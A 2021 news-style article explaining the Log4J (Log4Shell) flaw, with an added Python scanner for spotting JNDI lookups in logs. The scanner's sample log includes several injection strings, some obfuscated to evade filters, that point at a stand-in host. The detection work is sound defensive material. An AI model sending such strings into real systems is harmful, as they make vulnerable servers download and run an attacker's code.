date 2021-12-15

The image reproduced below is making the rounds of IT communities around the world: it tells, in an ironic way, what is happening with what has been described as by far the most serious IT flaw of recent years.

The image is easy to understand once you realise that the modern world, as far as its technology goes, is built on open source: the operating systems and software on every device integrate dozens of libraries developed and maintained by companies and by volunteers, people who started a project because they needed it and then released it to give the project a purpose and make life easier for others too.

Today nobody reinvents the wheel: programming is a creative job, but part of that job is knowing how to choose libraries and pieces of code that are already written, tested and safe, in order to add functions that, written from scratch, would cost a lot of time and carry a lot of risk.

If any one of these libraries has a serious problem, everything collapses.

Log4J is one of these libraries, and it was not created, as the cartoon says, by a person living in Nebraska but by a Swiss developer, Ceki Gülcü, who later handed it over to the Apache Software Foundation.

We are facing what is perhaps the most widely used logging library in the Java world; today it is estimated that there are at least 3 billion devices in the world that make use of it.

One of these is Minecraft, and it is thanks to Minecraft that the devastating flaw in Log4J was discovered: a flaw that will ruin the holidays of many IT managers and that has created, and is still creating, an enormous series of problems.

Someone has said that we are facing a possible cyber catastrophe, and although exaggerations should always be taken with a grain of salt, once we have explained how the flaw works, and how easily it can be exploited now that it is public, it becomes clear that we really are facing an enormous risk.

Giants like Apple, Microsoft, Google and Oracle have already started updating the library to the fixed version, but before they did, their systems remained vulnerable for some time. There are those who managed, for example, to change the name on iCloud.

We mentioned Minecraft because for a few weeks players in China were able to play pranks on other players simply by sending strings of code into the game’s chat. The chat is handled with Log4J, and it took a while before some security researchers raised the alarm. It was thus discovered that one of the most used libraries in the world had carried a devastating design error for some time, and that someone, as Minecraft demonstrates, was already exploiting it.

The bug is very simple: Log4J is supposed to display and manage only text strings, but when it is presented with a message formatted in a particular way it interprets part of it as an internet address, reaches it through the Java Naming and Directory Interface (JNDI), downloads the payload and executes it with the privileges of the main program. In practice it was enough to place a command inside the characters ${} to turn it into an executed command.

The diagram below clearly shows the flow: all an attacker has to do is insert the string somewhere it will surely end up saved in some “log”, and set up a server that Log4J will call to fetch the malware, which is then downloaded and executed.

In the days following the discovery, some security companies intercepted thousands of bots scanning the network for vulnerable devices and servers of all kinds, in order to upload malware, steal data, install cryptocurrency mining tools and much more.

Some have begun to insert filters on the type of call to mitigate the effects of the attack: many CDN operators, for example, have started to block and filter certain messages considered dangerous.

A disaster foretold, for several reasons: on the one hand we are talking about a logging library, and on many live servers you have to be very careful, because what is at the same time the attack vehicle is also the only tool available today to know whether anyone is exploiting that flaw. The update therefore requires attention.
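As an added example (not part of the article), a small Python scanner in the spirit of the log review and filtering described above: it resolves the nested lookups that Log4J itself would expand (lower, upper and the :-default form) so that a disguised lookup collapses back to ${jndi:...}, then reports which scheme and host each log line would have contacted. The sample log lines and the hostname attacker.example are constructed placeholders.

```python
import re
# Constructed sample log lines (not from the article): two benign requests and
# three probes of the kind described above, two of them using nested lookups
# to hide the "jndi" keyword from a naive text filter.
SAMPLE_LOG = """\
2021-12-11T10:02:13Z GET /index.html ua="Mozilla/5.0" 200
2021-12-11T10:02:14Z GET /login ua="${jndi:ldap://attacker.example/a}" 200
2021-12-11T10:02:15Z GET /search q=${${lower:j}ndi:${lower:l}dap://attacker.example/x} 200
2021-12-11T10:02:16Z GET /api ua="${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/o}" 500
2021-12-11T10:02:17Z GET /about ua="curl/7.79" 200
"""

# An innermost ${...} lookup: nothing further nested inside the braces.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup once normalized: ${jndi:<scheme>://<host>...
JNDI_LOOKUP = re.compile(r"\$\{jndi:([a-z]+)://([^/:}\s]+)", re.IGNORECASE)

def _resolve(match):
    # Expand only the obfuscation-style lookups (lower, upper, ":-default");
    # a jndi lookup, or any lookup not modelled here, is left as it is.
    body = match.group(1)
    prefix, _, rest = body.partition(":")
    if prefix.lower() == "jndi":
        return match.group(0)
    if ":-" in body:                      # ${anything:-default} -> default
        return body.split(":-", 1)[1]
    if prefix.lower() == "lower":
        return rest.lower()
    if prefix.lower() == "upper":
        return rest.upper()
    return match.group(0)

def normalize(text):
    # Resolve innermost lookups repeatedly, as Log4J itself would, until the
    # text stops changing: ${${lower:j}ndi:...} collapses to ${jndi:...}.
    while True:
        resolved = INNER_LOOKUP.sub(_resolve, text)
        if resolved == text:
            return resolved
        text = resolved

def scan_log(log_text):
    # One record per line that still carries a JNDI lookup after normalizing.
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        m = JNDI_LOOKUP.search(normalize(line))
        if m:
            hits.append({"line": number, "scheme": m.group(1).lower(), "host": m.group(2)})
    return hits
```

Run against real access or application logs, the host field is what to compare against outbound connection records when checking whether the lookup actually reached the attacker's server.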

Furthermore, in many cases the updated version of this library requires dependencies that may not be satisfiable by those running very old versions of the software: if some can update in a day, for others it may take weeks or months, and for others still the bug may remain open forever, with all the risks that entails.

Java is used throughout the enterprise environment, and Log4J is a huge threat. It was assigned a criticality score of 10/10 only because the scale goes no higher. There is, however, no doubt: it is the most serious cyber threat of the last few decades.